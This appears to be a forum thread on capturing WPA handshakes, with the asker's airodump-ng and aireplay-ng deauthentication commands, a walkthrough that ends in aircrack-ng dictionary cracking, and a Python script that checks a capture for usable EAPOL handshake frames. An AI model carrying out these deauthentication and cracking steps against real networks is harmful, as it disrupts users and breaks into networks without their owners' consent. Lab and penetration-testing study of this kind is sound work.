No handshake recorded from airodump-ng
I've just started to attempt this by following the guide from lewiscomputerhowto. I've seen other people ask similar questions, but they all seem to be older threads. The steps I've taken are shown below.
# Disconnect from all wireless networks.
sudo airmon-ng                      # This will show all devices available for monitor
sudo airmon-ng start wlan0mon       # Should state that your wireless device has monitor mode enabled;
                                    # if not, use the following steps
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# end of troubleshoot
sudo airodump-ng wlan0              # Identify desired network from the ESSID. Copy the BSSID of target.
sudo airodump-ng -c 6 --bssid AP_MAC -w /home/luke/Desktop/airodump/ wlan0
# Identify the BSSID and the associated client, which is listed under STATION
sudo aireplay-ng -0 2 -a AP_MAC -c CLIENT_MAC wlan0
This results in this feedback without mentioning a handshake has been recorded.
21:22:43  Waiting for beacon frame (BSSID: AP_MAC) on channel 6
21:22:44  Sending 64 directed DeAuth. STMAC: [CLIENT_MAC] [ 4|10 ACKs]
21:22:45  Sending 64 directed DeAuth. STMAC: [CLIENT_MAC] [ 1|11 ACKs]
Am I doing this incorrectly, or is there any advice on how this can be accomplished?
- Use a wireless sniffer or protocol analyzer (Wireshark or airmon-ng) to capture wireless packets. Sniffing this way is similar to how attackers sniff wired networks to eavesdrop on and capture information sent across a network.
- Wait for a wireless client to authenticate. WPA wireless clients authenticate with WAPs using a four-way handshake where they exchange information. Essentially, the client needs to prove to the WAP that it knows the passphrase. However, the client doesn’t send the passphrase in cleartext. Instead, the four-way handshake allows the client to encrypt the passphrase in such a way that the WAP can decrypt it and verify that the client has the correct passphrase.
- Use a brute force attack. Once attackers have the encrypted passphrase from the captured four-way handshake, they can launch an offline brute force attack. Automated tools such as Aircrack-ng compare the encrypted password in the capture against passwords in one or more password files. When successful, it gives the attacker the actual passphrase used by the WLAN.
The first thing we need to do is to turn our network adapter (wifi network adapter) into monitor mode, this will enable us to see wireless beacons sent across the airwaves even though it’s not actually associated with any access point.
To make wlan1 our monitor-mode adapter, we execute this command in the terminal: 'airmon-ng start wlan1'
Check whether it is now in monitor mode: 'iwconfig'
Now we're going to dump all the SSIDs found by our monitoring adapter. We use 'airodump-ng mon0'; what this does is look for the SSIDs that are being broadcast and dump that information to our terminal.
Look for the ENC column and see if there is WPA encryption.
Note: WPA2 is stronger than WPA, and it might take years to crack it.
Look for your targeted Wi-Fi.
Do this code below.
-w -> write (in our case we dump it to wpa2 file)
--bssid -> our target's BSSID
mon0 -> monitor adapter
Now that we have completed the 1st step (Sniffing). We’ll proceed to the 2nd step (Wait for a wireless client to authenticate).
Well, there’s an automated way to do that otherwise you’ll just be waiting for a miracle.
We use ‘aireplay-ng’ which is an injection attack. This forces a re-authentication packet into the wire.
-0 10 -> it's going to try 10 times; with -0 0 it will not limit the deauthentication attempts
-a -> the AP's BSSID (the Wi-Fi network's MAC address)
-c -> the client's MAC address (you may find this in a packet capture -> Wireshark). If you know someone's MAC you can try it, just make sure it's associated with the AP; if you don't have one, that's OK, it's just more effective if you have a client's MAC.
mon0 -> monitor adapter
Wait for a ‘WPA Handshake’ to pop up on our airodump.
Now, navigate your way to the file we wrote earlier, the 'wpa2' one.
Now we will run ‘aircrack-ng’ against the dump file we gathered earlier.
-w -> this is going to point to our passwords file (A Dictionary of Passwords).
Now press Enter.
This is step 3, people (use a brute force attack). We're trying to crack the password now. It runs through the dictionary for a match.
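Both the asker's symptom (deauths are ACKed, yet airodump-ng never shows "WPA handshake") and step 2 above come down to one question: does the .cap file actually contain the client's four EAPOL-Key messages? aircrack-ng reports a per-network handshake count when you run it on the file without a wordlist, and `tshark -r capture.cap -Y eapol` shows the raw frames. The script below is an added example, not code from this thread or from the aircrack-ng project: it reads a classic pcap, picks out unencrypted EAPOL-Key data frames, classifies them as message 1 to 4 from the Key Information bits (ACK, MIC, Install, Secure), and reports per (BSSID, client) pair whether the capture is usable for an offline attack, meaning it has the ANonce from M1 or M3 plus the SNonce and MIC from M2 with matching replay counters. The capture it inspects is constructed inside the script (hand-built frames with made-up MAC addresses, one complete handshake and one AP where the client never answered M1), so it runs without a wireless card; point `find_handshakes` at the bytes of a real `-w` output file to check your own capture.

```python
import struct

LINKTYPE_IEEE802_11 = 105           # bare 802.11 frames (airodump-ng's usual .cap link type)
LINKTYPE_IEEE802_11_RADIOTAP = 127  # 802.11 frames prefixed with a radiotap header
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # LLC/SNAP, EtherType 0x888E = EAPOL
# EAPOL-Key "Key Information" bits that tell the four handshake messages apart
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def pcap_records(data):
    """Yield (linktype, frame) for every record of a classic (non-pcapng) pcap file."""
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}[struct.unpack_from("<I", data, 0)[0]]
    linktype = struct.unpack_from(end + "I", data, 20)[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack_from(end + "IIII", data, off)[2]
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def classify_eapol_key(linktype, frame):
    """Return (bssid, client, message_number, replay_counter) for an unencrypted EAPOL-Key
    data frame; None for anything else (beacons, deauths, encrypted payload data)."""
    if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
        frame = frame[struct.unpack_from("<H", frame, 2)[0]:]   # radiotap length at offset 2
    elif linktype != LINKTYPE_IEEE802_11:
        return None
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2 or fc1 & 0x40:   # not a data frame, or Protected bit set
        return None
    to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
    addr1, addr2 = frame[4:10], frame[10:16]
    if to_ds and not from_ds:
        bssid, client = addr1, addr2           # client -> AP
    elif from_ds and not to_ds:
        bssid, client = addr2, addr1           # AP -> client
    else:
        return None
    hdr = 24 + (2 if (fc0 >> 4) & 0x8 else 0)  # QoS data frames carry a 2-byte QoS field
    if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL or len(frame) < hdr + 25 or frame[hdr + 9] != 3:
        return None                            # EAPOL packet type 3 = EAPOL-Key
    _desc, key_info, _key_len, replay = struct.unpack_from(">BHHQ", frame, hdr + 12)
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    install, secure = key_info & KI_INSTALL, key_info & KI_SECURE
    if ack and not mic:
        msg = 1                                # M1: AP sends ANonce
    elif mic and not ack and not install and not secure:
        msg = 2                                # M2: client sends SNonce + MIC
    elif ack and mic and install:
        msg = 3                                # M3: AP repeats ANonce, MIC, install flag
    elif mic and not ack and secure:
        msg = 4                                # M4: client acknowledges
    else:
        return None
    return bssid, client, msg, replay


def handshake_usable(msgs):
    """Offline cracking needs the ANonce (M1 or M3) plus SNonce and MIC from M2. M1/M2 share
    a replay counter and M3/M4 use the next one; that is how the pair is matched here."""
    seen = {}
    for num, rc in msgs:
        seen.setdefault(num, set()).add(rc)
    return any(rc in seen.get(1, ()) or rc + 1 in seen.get(3, ()) for rc in seen.get(2, ()))


def find_handshakes(pcap_bytes):
    """Map (bssid, client) -> {'messages': [...], 'usable': bool} for each EAPOL-Key exchange."""
    pairs = {}
    for linktype, frame in pcap_records(pcap_bytes):
        rec = classify_eapol_key(linktype, frame)
        if rec:
            bssid, client, msg, rc = rec
            pairs.setdefault((mac(bssid), mac(client)), []).append((msg, rc))
    return {k: {"messages": sorted({m for m, _ in v}), "usable": handshake_usable(v)}
            for k, v in pairs.items()}


# ---- constructed sample capture: hand-built frames, made-up MACs, not a real airodump file ----
AP, AP2, CLIENT = bytes.fromhex("001122334455"), bytes.fromhex("00deadbeef00"), bytes.fromhex("66778899aabb")


def eapol_key_frame(bssid, client, from_ap, key_info, replay):
    fc = b"\x08\x02" if from_ap else b"\x08\x01"            # plain data frame, FromDS or ToDS
    a1, a2 = (client, bssid) if from_ap else (bssid, client)
    header = fc + b"\x00\x00" + a1 + a2 + bssid + b"\x00\x00"
    body = struct.pack(">BHHQ", 2, key_info, 16, replay) + b"\x00" * 82  # nonce/IV/RSC/ID/MIC/len zeroed
    return header + LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(body)) + body


def pcap_file(frames, linktype=LINKTYPE_IEEE802_11):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(f), len(f)) + f
    return out


def build_sample_capture():
    deauth = b"\xc0\x00\x00\x00" + CLIENT + AP + AP + b"\x00\x00\x07\x00"  # management frame, ignored
    return pcap_file([
        deauth,
        eapol_key_frame(AP, CLIENT, True, 0x008A, 1),    # M1
        eapol_key_frame(AP, CLIENT, False, 0x010A, 1),   # M2
        eapol_key_frame(AP, CLIENT, True, 0x13CA, 2),    # M3
        eapol_key_frame(AP, CLIENT, False, 0x030A, 2),   # M4
        eapol_key_frame(AP2, CLIENT, True, 0x008A, 7),   # second AP: M1 only, client never reconnected
    ])


if __name__ == "__main__":
    for (bssid, client), info in find_handshakes(build_sample_capture()).items():
        status = "usable handshake" if info["usable"] else "NOT usable"
        print(f"{bssid} <-> {client}: messages {info['messages']} -> {status}")
```

A capture that shows only M1 for your target is the case in the question: the deauth worked (the station ACKed it) but the client's reconnection was not captured, typically because airodump-ng was not locked to the AP's channel, the client reconnected while the card was hopping, or it never reconnected at all. Nothing in such a file gives aircrack-ng a MIC to test wordlist entries against, so cracking cannot start until M2 is captured.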